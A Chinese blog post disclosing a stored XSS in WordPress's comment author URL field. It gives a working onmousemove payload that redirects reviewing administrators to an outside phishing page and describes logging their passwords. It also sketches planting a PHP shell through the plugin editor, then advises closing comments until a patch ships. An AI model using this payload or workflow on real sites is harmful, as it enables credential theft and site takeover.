| 关键词: 代码 php 管理员 评论 漏洞 密码 referer 文件 url 修补 |
实际上是个XSS漏洞。 POC: XML/HTML代码 1.在评论的网址一栏,填写 2.3.http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112); 这段代码仅供测试,是不能直接用的。 如果你拿我的shellcode去打别人的站,那密码就归我了,来之不拒啊。 管理员审核时,只要鼠标从url上路过,就会跳转到http://www.inbreak.net/a.php。 这里是个假的登录页面,钓鱼用。 管理员登录后,我们就能记录密码。 对于整个流程说明: 1,发评论让管理员对你的url有兴趣,然后等管理员上钩。 2,管理员在后台把鼠标移动到你的url上。 3,跳转到a.php,先获取referer。 4,输入密码后,提交到kxlzxtest/testxss/wp.php。 5,referer,user,pass保存为“域名.txt”。 6,输出一段JS,跳转到referer地址去。 a.php代码: PHP代码 1.<?php 2.3.$website = $_SERVER['HTTP_REFERER']; 4.5.$website=strtolower($website); 6.7.$website=substr($website,7); 8.9.$website=substr($website,0,strpos($website,‘/’)); 10.11.12.13.//这个页面是用来冒充登录页面的,危害巨大,代码不方便提供。 14.15.16.17.?> 18. wp.php代码 嗯。。。本来打算和某个短信平台配合一下,给我发短信提醒的,后来因为懒,就没写。 SHELL代码 1.<?php 2.3.//被lv老子过滤。 4.5.?> 这只是个DEMO,实际上,后台有编辑PHP文件的功能,你可以写个AJAX出来,自动获取编辑插件文件的页面中的token字段(名字忘记了,叫做XXonce),之后提交一个PHP shell过去。就不用钓鱼了。 漏洞代码: wordpresswp-adminincludestemplate.php 文件中的$author_url没有对单引号做过滤,最后又使用拼接href=’$author_url’。 导致我们可以添加一个这个href的事件函数进去。 前台的评论展示,也存在这个漏洞。 修补方式: 不建议自己手工修补,建议把评论暂时关闭,然后等官方补丁就是了。 到目前为止,官方可能还不知道。 语言不通,好心人看到同时,可以通知下官方。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|